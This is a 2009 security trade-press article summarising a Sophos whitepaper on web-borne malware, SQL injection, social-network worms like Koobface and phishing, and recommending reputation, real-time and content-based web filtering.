Enabling a safer internet: A positive approach to web security

03 Jun 09

With one new web page infected every 4.5 seconds, the web is now the number one vector of attack for cyber criminals. As the internet becomes an increasingly mission-critical tool, new media such as blogs and social networking sites are a necessary part of business, according to a whitepaper by IT security and control firm Sophos.

Taking advantage of web infrastructure vulnerabilities, particularly the ever-increasing capability for user-submitted content, hackers are able to covertly inject malicious code into more and more legitimate sites.

This web-based malware is then able to exploit social engineering tactics or browser vulnerabilities to infect visitors, the intention being to surreptitiously steal confidential information directly, install further malicious code or, worse, silently recruit the host system into a botnet – a network of hijacked computers for distributing further malware, spyware, or spam.

One of the main threats comes from SQL injection attacks. Such attacks exploit security vulnerabilities and insert malicious code (in this case script tags) into the database running a site. When user input, for instance via a web form, is not correctly filtered or checked, the code peppers the database with malicious instructions.

Social networking sites

A favourite target for today’s hackers are social networking websites. People who have learned to be suspicious of email links are on the whole less savvy about links posted on Facebook and the like. Hackers have found value in compromising Facebook accounts, stealing usernames and passwords, and then using the profiles as a launching pad for mass-distributing malware attacks and spam.

One particularly active threat is Koobface, a family of worms, and its rapid evolution demonstrates the wide range of social networks that are vulnerable. Initially targeting Facebook and MySpace, Koobface now targets a more diverse set of social networks, including MySpace, Bebo, hi5, GeoCities, Friendster and Tagged.

Blogs, micro-blogs and hackers

Hackers are also targeting other social media such as blogs. In much the same way that they set up malicious pages on fake websites and then use social engineering techniques to lure visitors to them, they are using free blogging services to create infected blogs. Unsuspecting victims then receive emails with links to the blog, from which malicious software is downloaded.

At the same time, vulnerabilities in common legitimate blogging platforms – just like any other platform – can be, and are, exploited by criminals. Of note is the micro-blogging site, Twitter, which has begun to be targeted. In January 2009, Twitter’s internal systems were hacked and the accounts of Britney Spears, Fox News and Barack Obama, among others, were broken into. Two months later hundreds of Twitter users were hit when messages were sent from compromised accounts trying to drive traffic to a pornographic website.

The spread of the phishing net phishing attacks – whereby unsuspecting users are directed to a bogus login page, which requests their username and password – continue to be a significant threat.

The risks posed by anonymizing proxies

Many organizations have responded to the growing web threat by using URL filtering to curtail Internet browsing. This has motivated many users to respond by using anonymizing proxies, which disguise the true nature of a website in order to trick an organization’s web filter into allowing access.

Anonymizing proxies are big business in the underground economy, driven by advertising revenues and subscription fees. Hundreds of new anonymizing proxies are created daily and distributed via blogs, forums, and dedicated websites.

The three pillars of modern web protection

A new approach to web security and control is required that fully supports the needs of business, equipping users with the tools they need to be more effective while eliminating the associated risks of potential infection from trusted legitimate sites. In addition to good preventive practices, such as rigorous patching and educating users about the risks of browsing, it is vital that organizations implement a comprehensive web security solution, comprising three key pillars of protection:

• Reputation-based filtering

• Real-time predictive malware filtering

• Content-based filtering.

Pillar One

Reputation-based filtering

Reputation-based filters are the first critical component in the fight against web-based threats.

They prevent access to a catalog of sites that are known to have hosted malware or other unwanted content, by filtering URLs based on their reputation as “good” or “bad”, and are an established and proven tool for successfully protecting against already known and located web-based threats. As well as providing this basic form of preventive protection, they help optimize network performance and staff productivity by blocking access to illegal, inappropriate, or nonbusiness-critical web content.

Although traditional URL filters often connect to vast, regularly updated databases of sites known to host malware or suspicious content, they have several significant shortcomings. In particular, they offer no protection against malware hosted on legitimate, previously safe, sites that have become hijacked. Neither do they protect against malware on newly created websites.

Pillar Two

Real-time predictive malware filtering

Real-time predictive malware filtering goes along way to closing the gap left by reputation-based filters. All web traffic passes through a scanner designed to identify both known and newly emerging zero-day malware. The malware engine is optimized for low-latency scanning and whenever a user accesses a website, irrespective of its reputation or category, the traffic is scanned using a combination of signatures and behavior-based technologies.

The use of real-time predictive threat filtering remains uncommon amongst many of the leading web filtering security solutions in the market today. Many security vendors are currently relying on signatures alone. Others who are fairly recent entrants to the market claim comprehensive solutions but lack the evidence to prove they are delivering fully proactive protection.

Pillar Three

Content-based filtering

Content-based filtering analyzes all web traffic on the network to determine the true filetype of ontent coming back from a website and can allow or disallow this traffic, based on corporate policy.

Content filters scan the actual content of a file, rather than simply looking at the file extension or the MIME-type reported by the web server, and so can identify and block files that are masquerading as innocent/allowed file types but really contain unauthorized content. A file might, for example, have a .TXT extension but in fact be an executable file.

Conclusion

Every minute of every day, cybercriminals are looking to exploit web traffic for commercial gain, and since web browsing is integral to most businesses’ day-to-day activities, the web gateway must be equipped with a security solution that enables business and users to be productive while providing the security essential to ensure a riskfree experience.

Organizations looking to protect against the growing threat of web-based malware need a solution that above all demonstrates its security attributes and combines powerful site and content controls with low-impact, effective administration.

At the same time end-user expectations and requirements for speed, efficiency, and open access to the tools and sites they need must be met. Solutions which fail to meet these demands for security, control, performance, and accessibility will ultimately fail the organization.

Get the latest stories first with info4security's newsletters: Click to signup

Post and bookmark this story at the following sites:

What is this?

del.icio.us	Digg	Reddit	Google	Newsvine